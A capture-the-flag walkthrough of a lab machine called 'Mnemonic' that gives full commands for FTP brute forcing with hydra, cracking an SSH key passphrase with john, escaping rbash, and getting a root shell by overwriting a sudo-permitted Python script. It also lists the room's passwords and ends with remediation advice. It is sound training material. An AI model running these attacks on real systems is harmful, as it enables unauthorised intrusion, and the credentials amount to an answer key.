Target IP: mnemonic.thm (Requires /etc/hosts entry)
Difficulty: Medium
Objective: User (condor) & Root (root.txt) Flags
1. Executive Summary
“Mnemonic” is a Linux machine that emphasizes cryptography and OSINT skills. Initial access requires enumerating web directories to find backup files, which leak a hint for FTP credentials. Brute-forcing FTP grants access to an encrypted SSH key, which is cracked to gain a restricted shell (rbash) as user james. Lateral movement involves decoding a “Mnemonic” image-based encryption scheme to recover the password for user condor. Privilege escalation is achieved by exploiting a misconfigured sudo permission on a Python script (examplecode.py), allowing for a root shell spawn.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port scanning.
- T1078 (Valid Accounts): Cracking FTP and SSH credentials.
- T1059.004 (Unix Shell): Escaping Restricted Bash (
rbash). - T1027 (Obfuscated Files or Information): Decoding Mnemonic image encryption.
- T1548.003 (Sudo and Sudo Caching): Exploiting sudo rights on a writable script.
2. Operational Setup
Host Configuration
echo "10.10.x.x mnemonic.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Your scan revealed the standard services, but SSH is on a non-standard port.
- 21/tcp (FTP): vsftpd 3.0.3.
- 80/tcp (HTTP): Apache.
- 1337/tcp (SSH): OpenSSH.
B. Web Enumeration
- Robots.txt: Disallows
/webmasters/*. - Directories: Accessing
/webmasters/reveals/adminand/backups. - The Leak: Inside
/backups, a zip file (or text file) contains a note:
James new ftp username: ftpuser
we have to work hardC. Credential Attacks (FTP)
We have a username ftpuser but no password.
hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://mnemonic.thm- Result:
ftpuser:love4ever.
4. Initial Access: SSH
A. FTP Loot
Logging into FTP reveals an SSH private key (id_rsa).
- Download:
get id_rsa. - Crack Passphrase:
ssh2john id_rsa > key.hash
john --wordlist=/usr/share/wordlists/rockyou.txt key.hash- Result:
bluelove.
B. Login & Rbash Escape
We log in as james on port 1337.
ssh -i id_rsa james@mnemonic.thm -p 1337- Constraint: We land in a restricted shell (
rbash). - Escape: Common escape techniques include using editors (
vi) or SSH flags.
# SSH Escape technique
ssh -i id_rsa james@mnemonic.thm -p 1337 -t "bash --noprofile"(Note: If -t works, you get a clean shell immediately. Otherwise, exporting PATH /bin:/usr/bin usually works if allowed).
5. Lateral Movement: Condor (The Mnemonic)
A. Enumeration
Files in james home directory:
note.txt: Hints at “Mnemonic Image based name”.6450.txt: A list of numbers.
Checking the /home/condor directory (which james can curiously list partially due to permissions on the folder itself or leaked filenames):
ls -la /home/condorYou found two base64 encoded filenames:
- Flag Hint:
VEhNe2E1Zj...->THM{...}(This looks like a flag, likely a distractor or User flag). - The Image URL:
aHR0cHM6...->https://i.ytimg.com/vi/K-96JmC2AkE/maxresdefault.jpg.
B. The Crypto Challenge
The note mentions Mnemonic. A quick Google search for “Mnemonic image encryption github” leads to MustafaTanguner/Mnemonic.
The Logic:
This tool encodes text into an image (pixels) or numbers.
We have a list of numbers in 6450.txt.
Decryption:
- Clone the Mnemonic tool.
- Run the decryption script against the number list.
python3 mnemonic.py -d -f 6450.txt(Or typically, the tool takes the image and the numbers to reconstruct the data).
Result:
- User:
condor - Password:
pasificbell1981
C. Switch User
su condor
# Password: pasificbell1981Status: User condor.
6. Privilege Escalation: Python Script
Enumeration
We check sudo privileges.
sudo -l
# (root) /usr/bin/python3 /bin/examplecode.pyThe Vulnerability
We inspect /bin/examplecode.py.
- Permissions: It is likely writable by
condorOR it imports a library we can hijack. - Your Method: You mentioned editing the file.
echo 'import os; os.system("/bin/bash")' > /bin/examplecode.pyExploitation
sudo /usr/bin/python3 /bin/examplecode.pyResult: Root shell spawned.
Root Flag: You noted the flag was MD5 encoded.
cat /root/root.txt
# Output: [MD5 Hash](Sometimes CTFs leave the flag as a hash to prove you read it, or you need to decrypt it. In this room, the hash is the flag).
7. Remediation (Blue Team)
- SSH Port: Changing the SSH port to 1337 is “Security by Obscurity.” Use standard ports with key-based auth and disable password auth.
- Restricted Shells:
rbashis easily bypassed if the user can execute editors (vi,nano) or if SSH allows command injection (-t "bash"). Ensure strict configuration. - Sudo Rights:
- Never allow users to run scripts (
examplecode.py) as root if the user has write access to the script file. - Use
chown root:rootandchmod 700for admin scripts.
- Information Leakage:
- Remove backup files (
/backups) from web-accessible directories. - Do not store hints about usernames (
ftpuser) in plain text.